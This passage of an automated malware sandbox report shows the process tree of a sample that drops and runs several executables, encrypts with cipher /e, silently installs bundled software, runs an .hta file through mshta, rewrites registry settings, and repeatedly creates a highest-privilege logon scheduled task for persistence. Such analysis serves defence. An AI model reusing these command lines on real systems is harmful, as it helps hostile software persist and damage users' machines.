                                                                        4⤵
                                                                          PID:1136
                                                                        • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                          "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1916,17888292816098142736,14186091619947786561,131072 --lang=de --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=35 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6976 /prefetch:1
                                                                          4⤵
                                                                            PID:5396
                                                                          • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                            "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1916,17888292816098142736,14186091619947786561,131072 --lang=de --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=36 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6012 /prefetch:1
                                                                            4⤵
                                                                              PID:3368
                                                                          • C:\Windows\SysWOW64\cmd.exe
                                                                            C:\Windows\system32\cmd.exe /K cipher.cmd
                                                                            3⤵
                                                                            • System Location Discovery: System Language Discovery
                                                                            PID:3148
                                                                            • C:\Windows\SysWOW64\cipher.exe
                                                                              cipher /e
                                                                              4⤵
                                                                              • System Location Discovery: System Language Discovery
                                                                              PID:4168
                                                                            • C:\Windows\SysWOW64\cipher.exe
                                                                              cipher /e
                                                                              4⤵
                                                                              • System Location Discovery: System Language Discovery
                                                                              PID:5360
                                                                            • C:\Windows\SysWOW64\cipher.exe
                                                                              cipher /e
                                                                              4⤵
                                                                                PID:2404
                                                                              • C:\Windows\SysWOW64\cipher.exe
                                                                                cipher /e
                                                                                4⤵
                                                                                • System Location Discovery: System Language Discovery
                                                                                PID:5164
                                                                            • C:\Users\Admin\AppData\Local\Temp\vir_4cebddec-542d-48db-9724-bef8759fd899\Rover.exe
                                                                              Rover.exe
                                                                              3⤵
                                                                              • Executes dropped EXE
                                                                              • Suspicious use of AdjustPrivilegeToken
                                                                              PID:4580
                                                                            • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                              "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument C:\Users\Admin\AppData\Local\Temp\vir_4cebddec-542d-48db-9724-bef8759fd899\web.htm
                                                                              3⤵
                                                                              • Suspicious use of WriteProcessMemory
                                                                              PID:2544
                                                                              • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=90.0.4430.212 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=90.0.818.66 --initial-client-data=0x100,0x104,0x108,0xa8,0x10c,0x7ffda2423cb8,0x7ffda2423cc8,0x7ffda2423cd8
                                                                                4⤵
                                                                                  PID:2444
                                                                                • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2008,9324511435986866139,14575939286567135752,131072 --lang=de --service-sandbox-type=none --mojo-platform-channel-handle=2020 /prefetch:3
                                                                                  4⤵
                                                                                  • Suspicious behavior: EnumeratesProcesses
                                                                                  PID:4748
                                                                              • C:\Users\Admin\AppData\Local\Temp\vir_4cebddec-542d-48db-9724-bef8759fd899\Google.exe
                                                                                Google.exe
                                                                                3⤵
                                                                                • Executes dropped EXE
                                                                                PID:4284
                                                                              • C:\Windows\SysWOW64\WScript.exe
                                                                                "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\vir_4cebddec-542d-48db-9724-bef8759fd899\helper.vbs"
                                                                                3⤵
                                                                                  PID:1952
                                                                                • C:\Windows\SysWOW64\PING.EXE
                                                                                  ping google.com -t -n 1 -s 4 -4
                                                                                  3⤵
                                                                                  • System Network Configuration Discovery: Internet Connection Discovery
                                                                                  • Runs ping.exe
                                                                                  PID:5624
                                                                                • C:\Windows\SysWOW64\PING.EXE
                                                                                  ping mrbeast.codes -t -n 1 -s 4 -4
                                                                                  3⤵
                                                                                  • System Location Discovery: System Language Discovery
                                                                                  • System Network Configuration Discovery: Internet Connection Discovery
                                                                                  • Runs ping.exe
                                                                                  PID:3620
                                                                                • C:\Windows\SysWOW64\xcopy.exe
                                                                                  xcopy Google.exe C:\Users\Admin\Desktop
                                                                                  3⤵
                                                                                  • Enumerates system info in registry
                                                                                  PID:4504
                                                                                • C:\Windows\SysWOW64\xcopy.exe
                                                                                  xcopy Rover.exe C:\Users\Admin\Desktop
                                                                                  3⤵
                                                                                  • Enumerates system info in registry
                                                                                  PID:5556
                                                                                • C:\Windows\SysWOW64\xcopy.exe
                                                                                  xcopy spinner.gif C:\Users\Admin\Desktop
                                                                                  3⤵
                                                                                  • System Location Discovery: System Language Discovery
                                                                                  • Enumerates system info in registry
                                                                                  PID:5364
                                                                                • C:\Windows\SysWOW64\cmd.exe
                                                                                  C:\Windows\system32\cmd.exe /K bloatware.cmd
                                                                                  3⤵
                                                                                  • Modifies registry class
                                                                                  PID:5836
                                                                                  • C:\Users\Admin\AppData\Local\Temp\vir_4cebddec-542d-48db-9724-bef8759fd899\bloatware\1.exe
                                                                                    1.exe
                                                                                    4⤵
                                                                                    • Executes dropped EXE
                                                                                    • Loads dropped DLL
                                                                                    • Drops file in Program Files directory
                                                                                    • Modifies registry class
                                                                                    PID:5228
                                                                                    • C:\Program Files (x86)\DroidCam\vc_redist.x86.exe
                                                                                      "C:\Program Files (x86)\DroidCam\vc_redist.x86.exe" /install /quiet
                                                                                      5⤵
                                                                                      • Executes dropped EXE
                                                                                      • System Location Discovery: System Language Discovery
                                                                                      PID:5152
                                                                                      • C:\Program Files (x86)\DroidCam\vc_redist.x86.exe
                                                                                        "C:\Program Files (x86)\DroidCam\vc_redist.x86.exe" /install /quiet -burn.unelevated BurnPipe.{8A5B56AE-39B7-442C-AEA2-E12001826869} {A6456C11-A005-434C-A2BA-486BE491110C} 5152
                                                                                        6⤵
                                                                                        • Executes dropped EXE
                                                                                        • Loads dropped DLL
                                                                                        PID:5068
                                                                                    • C:\Windows\SysWOW64\cmd.exe
                                                                                      C:\Windows\system32\cmd.exe /c install.bat
                                                                                      5⤵
                                                                                      • System Location Discovery: System Language Discovery
                                                                                      PID:4504
                                                                                      • C:\Windows\SysWOW64\regsvr32.exe
                                                                                        regsvr32 /s "DroidCamFilter32.ax"
                                                                                        6⤵
                                                                                        • Loads dropped DLL
                                                                                        • System Location Discovery: System Language Discovery
                                                                                        • Modifies registry class
                                                                                        PID:2232
                                                                                      • C:\Windows\SysWOW64\regsvr32.exe
                                                                                        regsvr32 /s "DroidCamFilter64.ax"
                                                                                        6⤵
                                                                                        • Loads dropped DLL
                                                                                        PID:3860
                                                                                        • C:\Windows\system32\regsvr32.exe
                                                                                          /s "DroidCamFilter64.ax"
                                                                                          7⤵
                                                                                          • Loads dropped DLL
                                                                                          • Modifies registry class
                                                                                          PID:548
                                                                                    • C:\Program Files (x86)\DroidCam\lib\insdrv.exe
                                                                                      "C:\Program Files (x86)\DroidCam\lib\insdrv.exe" +v
                                                                                      5⤵
                                                                                      • Executes dropped EXE
                                                                                      • Drops file in System32 directory
                                                                                      • Drops file in Windows directory
                                                                                      • Checks SCSI registry key(s)
                                                                                      • Suspicious use of AdjustPrivilegeToken
                                                                                      PID:3036
                                                                                    • C:\Program Files (x86)\DroidCam\lib\insdrv.exe
                                                                                      "C:\Program Files (x86)\DroidCam\lib\insdrv.exe" +a
                                                                                      5⤵
                                                                                      • Executes dropped EXE
                                                                                      • Drops file in System32 directory
                                                                                      • Drops file in Windows directory
                                                                                      • Checks SCSI registry key(s)
                                                                                      PID:2988
                                                                                  • C:\Users\Admin\AppData\Local\Temp\vir_4cebddec-542d-48db-9724-bef8759fd899\bloatware\3.exe
                                                                                    3.exe
                                                                                    4⤵
                                                                                    • Executes dropped EXE
                                                                                    • Modifies registry class
                                                                                    • Suspicious use of SetWindowsHookEx
                                                                                    PID:4660
                                                                                    • C:\Windows\SysWOW64\WerFault.exe
                                                                                      C:\Windows\SysWOW64\WerFault.exe -u -p 4660 -s 1908
                                                                                      5⤵
                                                                                      • Program crash
                                                                                      PID:1192
                                                                                  • C:\Windows\SysWOW64\mshta.exe
                                                                                    "C:\Windows\SysWOW64\mshta.exe" "C:\Users\Admin\AppData\Local\Temp\vir_4cebddec-542d-48db-9724-bef8759fd899\bloatware\2.hta" {1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}{1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}
                                                                                    4⤵
                                                                                    • Blocklisted process makes network request
                                                                                    • System Location Discovery: System Language Discovery
                                                                                    PID:5772
                                                                                  • C:\Windows\SysWOW64\cmd.exe
                                                                                    C:\Windows\system32\cmd.exe /K SilentSetup.cmd
                                                                                    4⤵
                                                                                      PID:6052
                                                                                      • C:\Users\Admin\AppData\Local\Temp\vir_4cebddec-542d-48db-9724-bef8759fd899\bloatware\4\WinaeroTweaker-1.40.0.0-setup.exe
                                                                                        WinaeroTweaker-1.40.0.0-setup.exe /SP- /VERYSILENT
                                                                                        5⤵
                                                                                        • Executes dropped EXE
                                                                                        PID:1240
                                                                                        • C:\Users\Admin\AppData\Local\Temp\is-A7JTT.tmp\WinaeroTweaker-1.40.0.0-setup.tmp
                                                                                          "C:\Users\Admin\AppData\Local\Temp\is-A7JTT.tmp\WinaeroTweaker-1.40.0.0-setup.tmp" /SL5="$60264,2180794,169984,C:\Users\Admin\AppData\Local\Temp\vir_4cebddec-542d-48db-9724-bef8759fd899\bloatware\4\WinaeroTweaker-1.40.0.0-setup.exe" /SP- /VERYSILENT
                                                                                          6⤵
                                                                                          • Executes dropped EXE
                                                                                          • Loads dropped DLL
                                                                                          • Drops file in Program Files directory
                                                                                          • System Location Discovery: System Language Discovery
                                                                                          • Suspicious behavior: EnumeratesProcesses
                                                                                          • Suspicious use of FindShellTrayWindow
                                                                                          PID:1288
                                                                                          • C:\Windows\SysWOW64\cmd.exe
                                                                                            "C:\Windows\System32\cmd.exe" /c taskkill /im winaerotweaker.exe /f
                                                                                            7⤵
                                                                                            • System Location Discovery: System Language Discovery
                                                                                            PID:5340
                                                                                            • C:\Windows\SysWOW64\taskkill.exe
                                                                                              taskkill /im winaerotweaker.exe /f
                                                                                              8⤵
                                                                                              • Kills process with taskkill
                                                                                              • Suspicious use of AdjustPrivilegeToken
                                                                                              PID:5408
                                                                                          • C:\Windows\SysWOW64\cmd.exe
                                                                                            "C:\Windows\System32\cmd.exe" /c taskkill /im winaerotweakerhelper.exe /f
                                                                                            7⤵
                                                                                            • System Location Discovery: System Language Discovery
                                                                                            PID:6024
                                                                                            • C:\Windows\SysWOW64\taskkill.exe
                                                                                              taskkill /im winaerotweakerhelper.exe /f
                                                                                              8⤵
                                                                                              • Kills process with taskkill
                                                                                              • Suspicious use of AdjustPrivilegeToken
                                                                                              PID:624
                                                                                  • C:\Users\Admin\AppData\Local\Temp\vir_4cebddec-542d-48db-9724-bef8759fd899\regmess.exe
                                                                                    regmess.exe
                                                                                    3⤵
                                                                                    • Executes dropped EXE
                                                                                    • System Location Discovery: System Language Discovery
                                                                                    PID:5504
                                                                                    • C:\Windows\SysWOW64\cmd.exe
                                                                                      C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\regmess_f0ed9c17-3bc2-4377-bbf4-85c0e55ac2ee\regmess.bat" "
                                                                                      4⤵
                                                                                        PID:5496
                                                                                        • C:\Windows\SysWOW64\reg.exe
                                                                                          reg import Setup.reg /reg:32
                                                                                          5⤵
                                                                                          • System Location Discovery: System Language Discovery
                                                                                          PID:2984
                                                                                        • C:\Windows\SysWOW64\reg.exe
                                                                                          reg import Console.reg /reg:32
                                                                                          5⤵
                                                                                            PID:5764
                                                                                          • C:\Windows\SysWOW64\reg.exe
                                                                                            reg import Desktop.reg /reg:32
                                                                                            5⤵
                                                                                            • Sets desktop wallpaper using registry
                                                                                            PID:1960
                                                                                          • C:\Windows\SysWOW64\reg.exe
                                                                                            reg import International.reg /reg:32
                                                                                            5⤵
                                                                                              PID:5644
                                                                                            • C:\Windows\SysWOW64\reg.exe
                                                                                              reg import Fonts.reg /reg:32
                                                                                              5⤵
                                                                                              • Modifies Internet Explorer settings
                                                                                              PID:5868
                                                                                            • C:\Windows\SysWOW64\reg.exe
                                                                                              reg import Cursors.reg /reg:32
                                                                                              5⤵
                                                                                              • System Location Discovery: System Language Discovery
                                                                                              PID:3932
                                                                                        • C:\Windows\SysWOW64\timeout.exe
                                                                                          timeout /t 10
                                                                                          3⤵
                                                                                          • Delays execution with timeout.exe
                                                                                          PID:5728
                                                                                        • C:\Users\Admin\AppData\Local\Temp\vir_4cebddec-542d-48db-9724-bef8759fd899\scary.exe
                                                                                          scary.exe
                                                                                          3⤵
                                                                                          • Executes dropped EXE
                                                                                          • Drops file in Program Files directory
                                                                                          • Suspicious use of AdjustPrivilegeToken
                                                                                          PID:1276
                                                                                          • C:\Windows\SYSTEM32\schtasks.exe
                                                                                            "schtasks" /create /tn "Windows 10 Boot" /sc ONLOGON /tr "C:\Program Files\SubDir\Romilyaa.exe" /rl HIGHEST /f
                                                                                            4⤵
                                                                                            • Scheduled Task/Job: Scheduled Task
                                                                                            PID:5320
                                                                                          • C:\Program Files\SubDir\Romilyaa.exe
                                                                                            "C:\Program Files\SubDir\Romilyaa.exe"
                                                                                            4⤵
                                                                                            • Executes dropped EXE
                                                                                            • Suspicious use of AdjustPrivilegeToken
                                                                                            • Suspicious use of FindShellTrayWindow
                                                                                            • Suspicious use of SendNotifyMessage
                                                                                            PID:1892
                                                                                            • C:\Windows\SYSTEM32\schtasks.exe
                                                                                              "schtasks" /create /tn "Windows 10 Boot" /sc ONLOGON /tr "C:\Program Files\SubDir\Romilyaa.exe" /rl HIGHEST /f
                                                                                              5⤵
                                                                                              • Scheduled Task/Job: Scheduled Task
                                                                                              PID:4016
                                                                                            • C:\Windows\system32\cmd.exe
                                                                                              C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\i41RNBgGRF4w.bat" "
                                                                                              5⤵
                                                                                                PID:6068
                                                                                                • C:\Windows\system32\chcp.com
                                                                                                  chcp 65001
                                                                                                  6⤵
                                                                                                    PID:4588
                                                                                                  • C:\Windows\system32\PING.EXE
                                                                                                    ping -n 10 localhost
                                                                                                    6⤵
                                                                                                    • System Network Configuration Discovery: Internet Connection Discovery
                                                                                                    • Runs ping.exe
                                                                                                    PID:1240
                                                                                                  • C:\Program Files\SubDir\Romilyaa.exe
                                                                                                    "C:\Program Files\SubDir\Romilyaa.exe"
                                                                                                    6⤵
                                                                                                    • Executes dropped EXE
                                                                                                    • Suspicious use of AdjustPrivilegeToken
                                                                                                    • Suspicious use of FindShellTrayWindow
                                                                                                    • Suspicious use of SendNotifyMessage
                                                                                                    PID:3300
                                                                                                    • C:\Windows\SYSTEM32\schtasks.exe
                                                                                                      "schtasks" /create /tn "Windows 10 Boot" /sc ONLOGON /tr "C:\Program Files\SubDir\Romilyaa.exe" /rl HIGHEST /f
                                                                                                      7⤵
                                                                                                      • Scheduled Task/Job: Scheduled Task
                                                                                                      PID:5036
                                                                                                    • C:\Windows\system32\cmd.exe
                                                                                                      C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\Wcyzu4tPrbdH.bat" "
                                                                                                      7⤵
                                                                                                        PID:5184
                                                                                                        • C:\Windows\system32\chcp.com
                                                                                                          chcp 65001
                                                                                                          8⤵
                                                                                                            PID:5512
                                                                                                          • C:\Windows\system32\PING.EXE
                                                                                                            ping -n 10 localhost
                                                                                                            8⤵
                                                                                                            • System Network Configuration Discovery: Internet Connection Discovery
                                                                                                            • Runs ping.exe
                                                                                                            PID:5652
                                                                                                          • C:\Program Files\SubDir\Romilyaa.exe
                                                                                                            "C:\Program Files\SubDir\Romilyaa.exe"
                                                                                                            8⤵
                                                                                                            • Executes dropped EXE
                                                                                                            • Suspicious use of AdjustPrivilegeToken
                                                                                                            • Suspicious use of FindShellTrayWindow
                                                                                                            • Suspicious use of SendNotifyMessage
                                                                                                            PID:3064
                                                                                                            • C:\Windows\SYSTEM32\schtasks.exe
                                                                                                              "schtasks" /create /tn "Windows 10 Boot" /sc ONLOGON /tr "C:\Program Files\SubDir\Romilyaa.exe" /rl HIGHEST /f
                                                                                                              9⤵
                                                                                                              • Scheduled Task/Job: Scheduled Task
                                                                                                              PID:5796
                                                                                                            • C:\Windows\system32\cmd.exe
                                                                                                              C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\khOuvioCPrvI.bat" "
                                                                                                              9⤵
                                                                                                                PID:5732
                                                                                                                • C:\Windows\system32\chcp.com
                                                                                                                  chcp 65001
                                                                                                                  10⤵
                                                                                                                    PID:6140
                                                                                                                  • C:\Windows\system32\PING.EXE
                                                                                                                    ping -n 10 localhost
                                                                                                                    10⤵
                                                                                                                    • System Network Configuration Discovery: Internet Connection Discovery
                                                                                                                    • Runs ping.exe
                                                                                                                    PID:1344
                                                                                                                  • C:\Program Files\SubDir\Romilyaa.exe
                                                                                                                    "C:\Program Files\SubDir\Romilyaa.exe"
                                                                                                                    10⤵
                                                                                                                    • Executes dropped EXE
                                                                                                                    • Suspicious use of AdjustPrivilegeToken
                                                                                                                    • Suspicious use of FindShellTrayWindow
                                                                                                                    • Suspicious use of SendNotifyMessage
                                                                                                                    PID:5540
                                                                                                                    • C:\Windows\SYSTEM32\schtasks.exe
                                                                                                                      "schtasks" /create /tn "Windows 10 Boot" /sc ONLOGON /tr "C:\Program Files\SubDir\Romilyaa.exe" /rl HIGHEST /f
                                                                                                                      11⤵
                                                                                                                      • Scheduled Task/Job: Scheduled Task
                                                                                                                      PID:5468
                                                                                                                    • C:\Windows\system32\cmd.exe
                                                                                                                      C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\DtcADzP4CkNt.bat" "
                                                                                                                      11⤵
                                                                                                                        PID:1732
                                                                                                                        • C:\Windows\system32\chcp.com
                                                                                                                          chcp 65001
                                                                                                                          12⤵
                                                                                                                            PID:3212
                                                                                                                          • C:\Windows\system32\PING.EXE
                                                                                                                            ping -n 10 localhost
                                                                                                                            12⤵
                                                                                                                            • System Network Configuration Discovery: Internet Connection Discovery
                                                                                                                            • Runs ping.exe
                                                                                                                            PID:5492
                                                                                                                          • C:\Program Files\SubDir\Romilyaa.exe
                                                                                                                            "C:\Program Files\SubDir\Romilyaa.exe"
                                                                                                                            12⤵
                                                                                                                            • Executes dropped EXE
                                                                                                                            • Suspicious use of AdjustPrivilegeToken
                                                                                                                            • Suspicious use of FindShellTrayWindow
                                                                                                                            • Suspicious use of SendNotifyMessage
                                                                                                                            PID:5652
                                                                                                                            • C:\Windows\SYSTEM32\schtasks.exe
                                                                                                                              "schtasks" /create /tn "Windows 10 Boot" /sc ONLOGON /tr "C:\Program Files\SubDir\Romilyaa.exe" /rl HIGHEST /f
                                                                                                                              13⤵
                                                                                                                              • Scheduled Task/Job: Scheduled Task
                                                                                                                              PID:5184
                                                                                                                            • C:\Windows\system32\cmd.exe
                                                                                                                              C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\NJiMgQCeImzQ.bat" "
                                                                                                                              13⤵
                                                                                                                                PID:1552
                                                                                                                                • C:\Windows\system32\chcp.com
                                                                                                                                  chcp 65001
                                                                                                                                  14⤵
                                                                                                                                    PID:1480
                                                                                                                                  • C:\Windows\system32\PING.EXE
                                                                                                                                    ping -n 10 localhost
                                                                                                                                    14⤵
                                                                                                                                    • System Network Configuration Discovery: Internet Connection Discovery
                                                                                                                                    • Runs ping.exe
                                                                                                                                    PID:5908
                                                                                                                                  • C:\Program Files\SubDir\Romilyaa.exe
                                                                                                                                    "C:\Program Files\SubDir\Romilyaa.exe"
                                                                                                                                    14⤵
                                                                                                                                    • Executes dropped EXE
                                                                                                                                    • Suspicious use of FindShellTrayWindow
                                                                                                                                    • Suspicious use of SendNotifyMessage
                                                                                                                                    PID:4748
                                                                                                                                    • C:\Windows\SYSTEM32\schtasks.exe
                                                                                                                                      "schtasks" /create /tn "Windows 10 Boot" /sc ONLOGON /tr "C:\Program Files\SubDir\Romilyaa.exe" /rl HIGHEST /f
                                                                                                                                      15⤵
                                                                                                                                      • Scheduled Task/Job: Scheduled Task
                                                                                                                                      PID:3188
                                                                                                                                    • C:\Windows\system32\cmd.exe
                                                                                                                                      C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\nKfkG91xUtHw.bat" "
                                                                                                                                      15⤵
                                                                                                                                        PID:4704
                                                                                                                                        • C:\Windows\system32\chcp.com
                                                                                                                                          chcp 65001
                                                                                                                                          16⤵
                                                                                                                                            PID:3856
                                                                                                                                          • C:\Windows\system32\PING.EXE
                                                                                                                                            ping -n 10 localhost
                                                                                                                                            16⤵
                                                                                                                                            • System Network Configuration Discovery: Internet Connection Discovery
                                                                                                                                            • Runs ping.exe
                                                                                                                                            PID:5852
                                                                                                                                          • C:\Program Files\SubDir\Romilyaa.exe
                                                                                                                                            "C:\Program Files\SubDir\Romilyaa.exe"
                                                                                                                                            16⤵
                                                                                                                                            • Executes dropped EXE
                                                                                                                                            • Suspicious use of FindShellTrayWindow
                                                                                                                                            • Suspicious use of SendNotifyMessage
                                                                                                                                            PID:984
                                                                                                                                            • C:\Windows\SYSTEM32\schtasks.exe
                                                                                                                                              "schtasks" /create /tn "Windows 10 Boot" /sc ONLOGON /tr "C:\Program Files\SubDir\Romilyaa.exe" /rl HIGHEST /f
                                                                                                                                              17⤵
                                                                                                                                              • Scheduled Task/Job: Scheduled Task
                                                                                                                                              PID:6140
                                                                                                                                            • C:\Windows\system32\cmd.exe
                                                                                                                                              C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\h0SgGEDOhZUH.bat" "
                                                                                                                                              17⤵
                                                                                                                                                PID:5412
                                                                                                                                                • C:\Windows\system32\chcp.com
                                                                                                                                                  chcp 65001
                                                                                                                                                  18⤵
                                                                                                                                                    PID:3856
                                                                                                                                                  • C:\Windows\system32\PING.EXE
                                                                                                                                                    ping -n 10 localhost
                                                                                                                                                    18⤵
                                                                                                                                                    • System Network Configuration Discovery: Internet Connection Discovery
                                                                                                                                                    • Runs ping.exe
                                                                                                                                                    PID:6416
                                                                                                                                                  • C:\Program Files\SubDir\Romilyaa.exe
                                                                                                                                                    "C:\Program Files\SubDir\Romilyaa.exe"
                                                                                                                                                    18⤵
                                                                                                                                                    • Executes dropped EXE
                                                                                                                                                    • Suspicious use of SendNotifyMessage
                                                                                                                                                    PID:6800
                                                                                                                                                    • C:\Windows\SYSTEM32\schtasks.exe
                                                                                                                                                      "schtasks" /create /tn "Windows 10 Boot" /sc ONLOGON /tr "C:\Program Files\SubDir\Romilyaa.exe" /rl HIGHEST /f
                                                                                                                                                      19⤵
                                                                                                                                                      • Scheduled Task/Job: Scheduled Task
                                                                                                                                                      PID:6808
                                                                                                                                                    • C:\Windows\system32\cmd.exe
                                                                                                                                                      C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\MyX00B2LJcij.bat" "
                                                                                                                                                      19⤵
                                                                                                                                                        PID:6372
                                                                                                                                                        • C:\Windows\system32\chcp.com
                                                                                                                                                          chcp 65001
                                                                                                                                                          20⤵
                                                                                                                                                            PID:6304
                                                                                                                                                          • C:\Windows\system32\PING.EXE
                                                                                                                                                            ping -n 10 localhost
                                                                                                                                                            20⤵
                                                                                                                                                            • System Network Configuration Discovery: Internet Connection Discovery
                                                                                                                                                            • Runs ping.exe
                                                                                                                                                            PID:5620
                                                                                                                                                          • C:\Program Files\SubDir\Romilyaa.exe
                                                                                                                                                            "C:\Program Files\SubDir\Romilyaa.exe"
                                                                                                                                                            20⤵
                                                                                                                                                            • Executes dropped EXE
                                                                                                                                                            • Suspicious use of SendNotifyMessage
                                                                                                                                                            PID:7124
                                                                                                                                                            • C:\Windows\SYSTEM32\schtasks.exe
                                                                                                                                                              "schtasks" /create /tn "Windows 10 Boot" /sc ONLOGON /tr "C:\Program Files\SubDir\Romilyaa.exe" /rl HIGHEST /f
                                                                                                                                                              21⤵
                                                                                                                                                              • Scheduled Task/Job: Scheduled Task
                                                                                                                                                              PID:6948
                                                                                                                                                            • C:\Windows\system32\cmd.exe
                                                                                                                                                              C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\BP17K7i1JiQy.bat" "
                                                                                                                                                              21⤵
                                                                                                                                                                PID:3552
                                                                                                                                                                • C:\Windows\system32\chcp.com
                                                                                                                                                                  chcp 65001
                                                                                                                                                                  22⤵
                                                                                                                                                                    PID:1908
                                                                                                                                                                  • C:\Windows\system32\PING.EXE
                                                                                                                                                                    ping -n 10 localhost
                                                                                                                                                                    22⤵
                                                                                                                                                                    • System Network Configuration Discovery: Internet Connection Discovery
                                                                                                                                                                    • Runs ping.exe
                                                                                                                                                                    PID:5628
                                                                                                                                                                  • C:\Program Files\SubDir\Romilyaa.exe
                                                                                                                                                                    "C:\Program Files\SubDir\Romilyaa.exe"
                                                                                                                                                                    22⤵
                                                                                                                                                                    • Executes dropped EXE
                                                                                                                                                                    • Suspicious use of SendNotifyMessage
                                                                                                                                                                    PID:6392
                                                                                                                                                                    • C:\Windows\SYSTEM32\schtasks.exe
                                                                                                                                                                      "schtasks" /create /tn "Windows 10 Boot" /sc ONLOGON /tr "C:\Program Files\SubDir\Romilyaa.exe" /rl HIGHEST /f
                                                                                                                                                                      23⤵
                                                                                                                                                                      • Scheduled Task/Job: Scheduled Task
                                                                                                                                                                      PID:444
                                                                                                                                                                    • C:\Windows\system32\cmd.exe
                                                                                                                                                                      C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\Pn1mfNXCsHGP.bat" "
                                                                                                                                                                      23⤵
                                                                                                                                                                        PID:6988
                                                                                                                                                                        • C:\Windows\system32\chcp.com
                                                                                                                                                                          chcp 65001
                                                                                                                                                                          24⤵
                                                                                                                                                                            PID:6424
                                                                                                                                                                          • C:\Windows\system32\PING.EXE
                                                                                                                                                                            ping -n 10 localhost
                                                                                                                                                                            24⤵
                                                                                                                                                                            • System Network Configuration Discovery: Internet Connection Discovery
                                                                                                                                                                            • Runs ping.exe
                                                                                                                                                                            PID:6856
                                                                                                                                                                          • C:\Program Files\SubDir\Romilyaa.exe
                                                                                                                                                                            "C:\Program Files\SubDir\Romilyaa.exe"
                                                                                                                                                                            24⤵
                                                                                                                                                                            • Executes dropped EXE
                                                                                                                                                                            • Suspicious use of SendNotifyMessage
                                                                                                                                                                            PID:6280
                                                                                                                                                                            • C:\Windows\SYSTEM32\schtasks.exe
                                                                                                                                                                              "schtasks" /create /tn "Windows 10 Boot" /sc ONLOGON /tr "C:\Program Files\SubDir\Romilyaa.exe" /rl HIGHEST /f
                                                                                                                                                                              25⤵
                                                                                                                                                                              • Scheduled Task/Job: Scheduled Task
                                                                                                                                                                              PID:6324
                                                                                                                                                                            • C:\Windows\system32\cmd.exe
                                                                                                                                                                              C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\S4If3k66CFtH.bat" "
                                                                                                                                                                              25⤵
                                                                                                                                                                                PID:6364
                                                                                                                                                                                • C:\Windows\system32\chcp.com
                                                                                                                                                                                  chcp 65001
                                                                                                                                                                                  26⤵
                                                                                                                                                                                    PID:6892
                                                                                                                                                                                  • C:\Windows\system32\PING.EXE
                                                                                                                                                                                    ping -n 10 localhost
                                                                                                                                                                                    26⤵
                                                                                                                                                                                    • System Network Configuration Discovery: Internet Connection Discovery
                                                                                                                                                                                    • Runs ping.exe
                                                                                                                                                                                    PID:7164
                                                                                                                                    • C:\Users\Admin\AppData\Local\Temp\vir_4cebddec-542d-48db-9724-bef8759fd899\the.exe
                                                                                                                                      the.exe
                                                                                                                                      3⤵
                                                                                                                                      • Executes dropped EXE
                                                                                                                                      PID:2220
                                                                                                                                      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
